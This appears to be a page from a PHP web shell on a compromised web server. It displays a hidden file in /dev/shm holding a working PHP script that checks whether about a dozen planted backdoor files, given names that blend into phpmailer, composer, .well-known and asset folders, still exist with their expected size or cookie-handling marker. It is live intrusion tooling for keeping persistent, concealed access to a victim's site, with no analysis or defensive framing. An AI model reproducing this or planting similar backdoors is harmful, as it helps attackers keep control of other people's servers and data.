Your IP : 216.73.216.5


Current Path : /dev/shm/
Upload File :
Current File : //dev/shm/.record

<?php   $r = '/home/zeehbgzf/staging.zeehtech.com'; $x = ["/assets/img/xenobe.php"=>"bd@@57480230@@1088",
"/.well-known/init.php"=>"bd@@63320459@@534",
"/vendor/phpmailer/phpmailer/newUser.php"=>"bd@@66340033@@$_COOKIE[-",
"/vendor/composer/installed.check.php"=>"bd@@57499941@@556",
"/vendor/phpmailer/phpmailer/get.oauth.token.php"=>"bd@@57480030@@1618",
"/vendor/phpmailer/myship.php"=>"bd@@63319826@@535",
"/assets/css/HINFO.php"=>"bd@@57480695@@1800",
"/vendor/phpmailer/phpmailer/language/phpmailer.lang-sk.php"=>"bd@@66324563@@settings",
"/.well-known/pki-validation/myblockslist.php"=>"bd@@63319594@@634",
"/vendor/phpmailer/phpmailer/src/gd.thumbnail.inc.php"=>"bd@@57479724@@534",
"/assets/js/peer.php"=>"bd@@63319372@@1459",
"/f_top.php"=>"bd@@66465892@@622",
"/project.f.php"=>"bd@@66465900@@1742"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');